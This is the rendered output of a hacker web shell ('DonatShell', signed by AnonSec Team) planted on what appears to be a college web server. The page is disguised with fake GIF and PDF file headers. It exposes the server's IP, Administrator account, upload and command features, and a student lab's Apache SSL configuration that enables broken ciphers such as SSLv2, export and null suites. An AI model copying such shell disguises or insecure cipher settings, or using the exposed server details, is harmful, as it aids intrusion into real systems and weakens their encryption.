GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1611/Labs/Lab08/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1611/Labs/Lab08//nic.txt
# Lab08 
LoadModule ssl_module modules/mod_ssl.so
<IfModule ssl_module>
      Listen 443
      AddType application/x-x509-ca-cert .crt
      AddType application/x-pkcs7-crl .crl
      SSLPassPhraseDialog builtin
      SSLSessionCache "shmcb:C/Apache24/logs/ssl_scache(512000)"
      SSLSessionCacheTimeout 300
      SSLRandomSeed startup builtin
      SSLRandomSeed connect builtin
      <FilesMatch "\.(cgi|shtml|phtml|php)$">
            SSLOptions +StdEnvVars
      </FilesMatch>
</IfModule>
<VirtualHost *:443>
      DocumentRoot "C:/Data_WWW/CST1611/Lab08"
      ServerName Lab08.test
      ErrorLog logs/Lab08.test.Error.log
      CustomLog logs/Lab08.test.Access.log common
      SSLEngine on
      SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
      SSLCertificateFile "C:/Data_WWW/CST1611/Lab08/Lab08.test.crt"
      SSLCertificateKeyFile "C:/Data_WWW/CST1611/Lab08/Lab08.test.key"
      <Directory  "C:/Data_WWW/CST1611/Lab08/">
            Options All +MultiViews
            AllowOverride All
            Require all granted
      </Directory>
</VirtualHost>

Anon7 - 2022
AnonSec Team